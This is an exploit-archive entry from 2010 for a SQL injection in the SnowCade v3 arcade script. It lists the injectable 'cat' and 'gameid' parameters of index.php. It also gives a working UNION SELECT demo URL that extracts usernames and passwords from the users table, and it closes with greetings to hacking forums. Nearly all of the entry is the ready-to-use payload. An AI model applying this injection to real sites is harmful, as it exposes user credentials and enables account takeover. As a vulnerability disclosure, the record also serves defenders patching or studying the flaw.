SnowCade v3 SQL Injection Vulnerability

2010-06-19T00:00:00
ID 1337DAY-ID-12796
Type zdt
Reporter ahwak2000
Modified 2010-06-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =======================================
SnowCade v3 SQL Injection Vulnerability
=======================================


/*
[-] SnowCade v3 SQL Injection Vulnerability [-]
 
 
---Date : 2010-06-19
---Author : ahwak2000
---Email : z.u5[at]hotmail.com
[-] Script Info [-]
---Home : http://www.arcadecreate.com/
 
[-] Vulnerability [-]
 
 
http://site.com/[path]/index.php?action=browse&cat=[SQL INj]
 
 
 
http://site.com/[path]/index.php?action=playgame&gameid=[SQL INj]
 
 
 
http://site.com/[path]/index.php?action=browse&cat=[SQL INj]
 
 
 
[-] DEM0[-]
http://server/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--
 
[-] Greetz to [-]
 
To All Friends in V4-team Forums And pc.pirate
*/



#  0day.today [2018-03-19]  #